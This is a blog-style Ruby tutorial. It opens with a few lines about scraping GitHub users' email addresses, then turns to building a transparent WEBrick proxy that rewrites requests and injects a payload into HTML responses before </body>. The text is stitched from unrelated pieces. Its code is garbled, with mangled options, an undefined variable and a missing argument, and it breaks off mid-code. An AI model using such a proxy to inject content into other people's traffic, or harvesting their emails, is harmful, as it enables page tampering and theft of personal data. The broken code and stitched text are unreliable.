Small proof of concept to crawl several emails using Google, ruby and some Sunday coding.
One of the things that Github discloses ( if provided ) is the email addresses. Short of that, it also discloses information such as Full Name, website, Location, etc, as it is show on the image below.
I’ve search and search, asked Google, yahoo, sarasa search, and pretty much everyone else I know. Everything was incomplete, not well explain or not in subject at all. After many days of looking I found a japanese site, which I did not understood much of it but after I google translated I was able to check some code and learn how to capture the response body messages.
NOTE: As a word of advice, it is worth mentioning that this situation where only the Japanese have ruby code, has happened several times before with weird and undocumented methods or libraries. So it’s always good to look in google.jp for ruby code
You may say why to even bother to do a Transparent proxy in ruby which is able to inject code, well maybe the answer is just because I want to see if I can do it.
I decided to do my PoC with the native library WEBrick, a simple and light HTTPserver among other things.
Simple Proxy :
The first thing I usually do is check the official site and Rdoc for the lib. Unluckily, I was only able to find how to do a normal proxy. and work with the request.
require 'webrick'
require 'webrick/httproxy'
WEBrick::HTTPProxyServer.new
ort 8080,
:BindAddress => '0.0.0.0',
:ServerType => Thread,
:RequestCallback => Proc.new {|req,res| puts "#{req.unparsed_uri}" }
a.start
Simple Proxy server.
Fixing the URI :
With this we can setup Firefox, safari or any other web browser to use the proxy on localhost:8080 and Eureka, we have a proxy that will printout the unparsed_uri for our request.
This in theory works like a charm , but wait. If you see the request Firefox is doing the following
Browser request using a proxy server.
GET http://www.sarasa.com/ HTTP/1.1
...
Normal the brower when requesting a page , will use HTTP/1.1 and use the header “Host” to specified the url and just connect using a:
Browser request.
GET / HTTP/1.1
Host: www.sarasa.com
Having said this, here is the first wall I encounter. This is something that was undocumented: how do we turn our proxy into a transparent proxy?
The answer is simple. let’s modified our code and change the request. All the information is there we just have to re-write it to fit our need.
Before, we start we should know that our req is of type WEBrick::HTTPRequest. Knowing this we will do a little monkey patching to add a new method to the class and
require 'webrick'
require 'webrick/httproxy'
class WEBrick::HTTPRequest
def update_uri(uri)
@unparsed_uri = uri
@request_uri = parse_uri(uri)
end
end
req_call = Proc.new do |req,res|
req.update_uri()
puts "#{req.unparsed_uri}" }
end
WEBrick::HTTPProxyServer.new
ort 8080,
:BindAddress => '0.0.0.0',
:ServerType => Thread,
:RequestCallback => req_call
a.start
Transparent Proxy Server.
Injecting:
Well, a transparent proxy is cool , but we could do the same with squid or some other product. Let’s take it a little further and make it more interesting by adding an inject_payload to our response class.
require 'webrick'
require 'webrick/httproxy'
class WEBrick::HTTPRequest
def update_uri(uri)
@unparsed_uri = uri
@request_uri = parse_uri(uri)
end
end
class WEBrick::HTTPResponse
def inject_payload(string)
if @content_type =~ /html/
@body.gsub!( /<\/body>/ , "
